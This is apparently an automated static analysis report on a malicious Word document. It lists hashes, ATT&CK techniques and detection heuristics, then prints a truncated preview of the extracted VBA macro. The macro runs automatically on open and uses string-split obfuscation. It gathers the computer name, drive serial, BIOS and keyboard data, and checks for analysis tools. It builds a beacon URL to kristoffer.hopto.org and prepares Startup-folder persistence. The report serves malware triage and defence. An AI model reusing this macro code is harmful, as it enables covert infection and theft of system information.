Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a56740dc2125dbf6…

MALICIOUS

Office (OLE)

5.37 MB Created: 2020-02-17 16:59:00 Authoring application: Microsoft Office Word First seen: 2020-07-24
MD5: 50ee3e9ee5cebd228b29bca72c311133 SHA-1: 53ca3b0ee9efa92538795c33040ecb3eac117c86 SHA-256: a56740dc2125dbf6f098422324839607e81dcf1e9ba4d0b38f171e3f9e446bc1
310 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that are automatically executed upon opening the document, as indicated by the Document_Open and p-code auto-exec firings. The macros utilize CreateObject and GetObject to instantiate WScript.Shell and WMI objects, specifically targeting Win32_Process to launch new processes. The script also attempts to construct a URL starting with 'http://kr' which likely serves as a download source for a secondary payload. The obfuscation technique of splitting string literals to reassemble API names like 'WScript.Shell' is also noted.

Heuristics 9

  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.microsoft.com/photo/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24413 bytes
SHA-256: 264bf5dc5419e87c14e716b75e00c68eca0fadfca16833e90840ba19263d6e0a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim bAhhm
Set bAhhm = CreateObject("" + "" + "W" + "" + "Sc" + "" + "r" + "ip" + "" + "t" + "." + "" + "S" + "h" + "el" + "" + "l")
Set WNetworkLib = CreateObject("" + "W" + "" + "S" + "cr" + "" + "ip" + "t" + "." + "Ne" + "" + "t" + "w" + "or" + "k")
Dim xyAlj, gzDFG
Set izbIj = CreateObject("S" + "" + "c" + "ri" + "pt" + "" + "ing" + "." + "" + "F" + "" + "i" + "l" + "eS" + "" + "ys" + "te" + "mO" + "" + "bj" + "e" + "ct")
bxmuG = Environ("H" + "" + "OME" + "DR" + "IV" + "" + "E")
cgBEz = Environ("C" + "" + "OM" + "PU" + "" + "TE" + "RN" + "" + "A" + "ME")
Set xyAlj = CreateObject("" + "" + "S" + "cr" + "" + "i" + "p" + "ti" + "" + "ng" + "" + "." + "F" + "il" + "" + "eS" + "" + "ys" + "te" + "mOb" + "" + "je" + "ct").GetDrive(bxmuG)
gApkx = Hex(xyAlj.SerialNumber)
Dim dmxpc, pYTeFm, nIsByC, GHdnd, vxEoh, icopg, wDyry
dmxpc = cgBEz & "_" & gApkx
Set xPEMcFXoxr = GetObject("" + "wi" + "" + "nm" + "gm" + "" + "ts" + ":" + "/" + "/" & "." & "/" + "ro" + "" + "o" + "t" + "/" + "ci" + "" + "m" + "v2" + "" + "")
Dim JjgiFELAVAh
  Set bcSbGOPkCeE = xPEMcFXoxr.ExecQuery("Se" + "" + "le" + "ct" + " *" + " fr" + "" + "om" + " Wi" + "n32" + "_B" + "" + "IO" + "S" + " wh" + "er" + "e" + " Pri" + "" + "mar" + "yBI" + "" + "OS " + "=" + " t" + "ru" + "" + "e", , 48)
For Each qVHlFWBsbAU In bcSbGOPkCeE
    ChqvzIEJeMJ = ChqvzIEJeMJ & qVHlFWBsbAU.Manufacturer & "-" & qVHlFWBsbAU.Version
Next
gzDFG = "ht" + "" + "t" + "p" + ":" + "/" + "/kristoffer.hopto.org/" + "" & dmxpc + "/" + ChqvzIEJeMJ + "/"
Dim nZDnQAXhNH()
Dim fIzITfFqmE, DUGbvM
On Error Resume Next
Do
DUGbvM = DUGbvM + 1
fIzITfFqmE = bAhhm.RegRead("HK" + "" + "C" + "U" + "\" + "Ke" + "" + "yb" + "oa" + "" + "rd" + " " + "La" + "you" + "" + "t\" + "" + "Pr" + "elo" + "" + "ad" + "\" + "" & DUGbvM)
If Err.Number = 0 Then
ReDim Preserve nZDnQAXhNH(DUGbvM - 1)
nZDnQAXhNH(DUGbvM - 1) = fIzITfFqmE
Else
Exit Do
End If
Loop
On Error GoTo 0
Dim HDHhHDlczO()
ReDim HDHhHDlczO(UBound(nZDnQAXhNH))
For DUGbvM = 0 To UBound(nZDnQAXhNH)
HDHhHDlczO(DUGbvM) = bAhhm.RegRead("HK" + "" + "LM" + "\" + "SY" + "" + "ST" + "EM\" + "Cur" + "ren" + "" + "tCon" + "tro" + "" + "lSe" + "t\" + "Co" + "" + "ntr" + "ol\" + "Key" + "boa" + "rd La" + "yo" + "ut" + "\Do" + "sKe" + "ybC" + "ode" + "s" + "\" & nZDnQAXhNH(DUGbvM))
gzDFG = gzDFG + "_" + HDHhHDlczO(DUGbvM)
Next
Set bcSbGOPkCeE = xPEMcFXoxr.ExecQuery("Se" + "" + "le" + "ct" + " *" + " fr" + "om" + " Wi" + "" + "n32" + "_Pr" + "oc" + "es" + "" + "s")
For Each qVHlFWBsbAU In bcSbGOPkCeE
If qVHlFWBsbAU.Name = "p" + "r" + "" + "oc" + "ex" + "" + "p" + "." + "e" + "" + "x" + "e" Then
gzDFG = gzDFG + "_!PExp"
End If
If qVHlFWBsbAU.Name = "w" + "" + "ir" + "" + "es" + "har" + "" + "k" + "." + "ex" + "" + "e" Then
gzDFG = gzDFG + "_!WShark"
End If
Next
gzDFG = gzDFG + "/i" + "ma" + "" + "g" + "e" + "18" + "." + "p" + "" + "h" + "p"
gzDFG = Replace(gzDFG, " ", "")
pYTeFm = Environ("A" + "" + "PP" + "" + "DA" + "T" + "" + "A" + "")
mlvVGpLJGOB = pYTeFm + "" + "" + "\" + "Mi" + "" + "cr" + "os" + "" + "of" + "t" + "\" + "" + "Wi" + "nd" + "" + "o" + "w" + "s" + "" + ""
nIsByC = mlvVGpLJGOB + "\""+FOjIeH+""" + "." + "" + "ex" + "" + "e" + ""
GHdnd = mlvVGpLJGOB + "\""+ FOjIeH +""" + "." + "t" + "" + "" + "xt" + ""
vxEoh = mlvVGpLJGOB + "" + "\" + "" + "St" + "" + "a" + "r" + "t" + " M" + "en" + "" + "u" + "\" + "Pr" + "" + "og" + "ra" + "ms" + "" + "\" + "St" + "ar" + "tu" + "" + "p" + "\" + """+ FOjIeH +""" + "" + "." + "vb" + "" + "s" + ""
wDyry = mlvVGpLJGOB + "" + "" + "\" + "S" + "" + "ta" + "" + "rt" + " " + "M" + "" + "en" + "u" + "\" + "" + "Pr" + "ogr" + "" + "am" + "s" + "\" + "S" + "ta" + "" + "rt" + "up" + "\" + "im" + "" + "a" + "ge" + "" + "." + "vb" + "" + "s" + ""

... (truncated)